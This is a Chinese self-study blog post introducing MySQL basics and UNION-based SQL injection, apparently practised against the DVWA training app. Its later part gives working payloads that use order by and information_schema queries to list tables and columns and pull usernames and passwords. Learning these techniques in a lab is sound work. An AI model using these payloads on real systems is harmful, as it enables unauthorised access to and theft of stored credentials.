自学sql注入(一)
这是笔者自行整理出来的有关sql注入的一些知识点,自己还有些迷迷糊糊,可能有些不对的地方。等学完之后,再来详写一系列的关于sql注入的文章
自学sql注入(二)
自学sql注入(三)
数据库MYSQL基础知识
1、什么是库、表、列、键、值
库:database,在数据库里面的数据的集合
表:table,隶属于某个库,在数据库里面以表格形式存在
列:column,表中竖着的内容
行:row,表中横着的内容
值:value,在表格中每个表格内的值
键:key,值的一种形式,在整个表内是独一无二没有重复的,用来精确匹配对应的值
表头:field,横着的第一排,用来表示各个列的名
2、mysql基础操作指南
在phpstudy里面进入mysql数据库查看,进入数据库:
先输入:mysql -u root -p 回车
再输入:root
mysql内的操作以分号 ; 结尾,一定要记得打
show databases; 查看当前所有的库
use dvwa; 进入dvwa的库
show tables; 查看dvwa库里面的表
desc users; 查看users表的表头信息
对数据的操作
select 查询数据,insert用于添加数据,update用于修改数据,delete用于删除数据
select user_id,user,password from users; //查看users表中,user_id,user,password列中的数据
delete from users where user_id=1; //删除user_id=1对应的行里面的值
insert into tabb (id,username,password) value (4,'test','test'); //在tabb表中插入表头为id,username,password的数据
update tabb set password='111111' where id=4; //修改tabb表里id为4的password的值为111111
SQL注入
原理:开发者对输入校验不严格,导致攻击者可以输入精心构造的sql语句,使之带入到数据库内与原有的语句进行拼接,继而改变原有的语义去执行攻击者想要执行的语句。
select username,password from tabb where id=1 and 1=2; //改变了数据库原有的查询
这就说明这里存在一个sql注入点
而sql注入有什么用?
1、获取敏感信息
2、获取服务器权限
从基础的union select(联合查询)注入说起:
1、union查询的要点是子查询的列数要与主查询列数一致;
2、使用order by 来确定主查询列数,order by本意是对主查询列进行排序,但是如果数字大于正确列数就会报错,小于或等于会正常显示。
3、确定后使用1,2,3,4,5…的数字来确定页面显示的位置;
4、在对应显示位置的数字上输入payload获得查询结果。
mysql中有几个默认的表达式,database(),user(),version(),分别表示当前数据库名,当前数据库用户,当前数据库版本
在mysql中有一个information_schema的库,里面存放了所有表的内容信息
-1 union select 1,(select table_name from information_schema.tables where table_schema='testa' limit 0,1),3
// 查询出当前的表
-1 union select 1,(select column_name from information_schema.columns where table_schema='testa' and table_name='tabb' limit 0,1),3
//查询出当前所有列名
-1 union select 1,(select username from tabb where id=1),(select password from tabb where id=1)
// 知晓列名和表名,就可以轻松查出所有的内容